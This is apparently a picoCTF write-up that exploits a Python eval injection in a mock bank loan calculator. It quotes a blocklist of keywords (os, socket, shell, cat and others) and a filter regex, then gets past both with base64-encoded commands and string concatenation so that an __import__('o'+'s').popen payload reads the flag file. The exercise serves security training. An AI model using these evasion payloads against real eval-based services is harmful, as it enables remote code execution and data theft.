Challenge
| Link | Difficulty | Status |
|---|---|---|
| https://play.picoctf.org/practice/challenge/484?category=1&originalEvent=74&page=1 |  |  |
Note
Description
ABC Bank’s website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank’s calculator and read the flag?
Additional details will be available after launching your challenge instance.
Solution
Launching the instance shows you the page below.
Now we know that this is using eval1 to compute the result of the loan amount. So when I type 3*3 I got a result of 9. What eval does is takes a valid python code as string and executes it.
Opening the devtools in the browser shows a comment like below:
TODO
------------
Secure python_flask eval execution by
1.blocking malcious keyword like os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind
2.Implementing regex: r'0x[0-9A-Fa-f]+|\\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|\.[A-Za-z0-9]{1,3}\b|[\\\/]|\.\.'
It says TODO but I have tried to run some code involving exec, os, eval and it doesn’t work.
So we move ahead with the assumption that the regex and keyword blacklisting is implemented.
We know what we need to do. we need to execute some valid python code in order to read the flag from the server’s filesystem. In case there were no check, my payload would have looked something like below.
__import__('os').popen('cat /flag.txt').read()This would have imported os module, open a process with the command cat /flag.txt and read the output of that command.
We not have two things to bypass:
- Bypass keyword blacklist. We are importing the os module and
osis blacklisted, this will be flagged. - We need to bypass the regex.
Whenever I have to deal with regex2 I turn to https://ihateregex.io/playground/ which lets you visualize any valid regex string. I have copied the regex from the comment above and it looks something like this.
0x[0-9A-Fa-f]+ # Matches hexadecimal numbers (e.g., 0x1A3F)
| # OR
\\u[0-9A-Fa-f]{4} # Matches Unicode escape sequences (e.g., \u1234)
| # OR
%[0-9A-Fa-f]{2} # Matches URL-encoded characters (e.g., %20 for a space)
| # OR
\.[A-Za-z0-9]{1,3}\b # Matches file extensions (e.g., .js, .txt, .py)
| # OR
[\\\/] # Matches backslashes or forward slashes (directory separators)
| # OR
\.\. # Matches double dots (..) often used for directory traversal
Let us copy and paste this string in ihateregex playground and see if the above payload will be flagged by the regex. And it sure does.
The character / and string ‘.txt’ are flagged as expected from the regex summary above. It checks for hexadecimal encoding, url encoding. This gives an idea on using base64 encoding which is not checked by the regex.
Refer to https://www.geeksforgeeks.org/encoding-and-decoding-base64-strings-in-python/ for how strings can be encoded and decoded in python. Let us first construct a base64 string of our cat command.
Now let use use it in our payload.
__import__('os').popen(__import__('base64').b64decode('Y2F0IC9mbGFnLnR4dA==').decode('ascii')).read()Let us see if this is flagged by the regex.
It’s no longer flagged.
Now the next step is to bypass the keyword blacklist. os can be written as ‘o’+‘s’ using string concatenation in python. Let us make that change and see if we are able to cheat the system in place.
Now the final payload looks something like below:
__import__('o'+'s').popen(__import__('base64').b64decode('Y2F0IC9mbGFnLnR4dA==').decode('ascii')).read()It works and we got out flag.
